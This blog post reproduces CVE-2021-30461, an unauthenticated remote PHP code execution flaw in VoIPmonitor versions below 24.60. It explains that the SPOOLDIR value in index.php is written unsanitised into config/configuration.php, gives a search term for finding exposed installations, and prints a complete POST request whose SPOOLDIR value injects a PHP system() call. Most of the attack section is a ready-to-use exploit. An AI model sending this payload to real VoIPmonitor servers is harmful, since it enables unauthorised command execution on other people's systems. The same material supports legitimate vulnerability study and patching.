Post

Voipmonitor Remote Command Execution Vulnerability Cve 2021 30461

Voipmonitor Remote Command Execution Vulnerability Cve 2021 30461

VoIPmonitor remote command execution vulnerability CVE-2021-30461

Vulnerability Description

Using data provided by users arriving through the web interface, allowing unauthenticated remote users to trigger remote PHP code execution vulnerabilities in VoIPmonitor.

Vulnerability Impact

VoIPmonitor < 24.60

Network surveying and mapping

“VoIPmonitor”

Vulnerability reappears

The login page is as follows

img

Key code in index.php file

1
2
3
4
5
6
7
8
$setConfigurationTypeValue_rslt = array();
if(file_exists('config/configuration.php')) {
	$existsConfiguration = true;
	if(isset($_POST['recheck'])) {
		if(!empty($_POST['SPOOLDIR'])) {
			setConfigurationTypeValue__index('SPOOLDIR', $_POST['SPOOLDIR']);
		}
	}

Pass in the parameters recheck and SPOOLDIR and write SPOOLDIR to config/configuration.php

img

Send the following request packet

POST /index.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 49

SPOOLDIR=test%22.system%28id%29.%22&recheck=annen

img

This post is licensed under CC BY 4.0 by the author.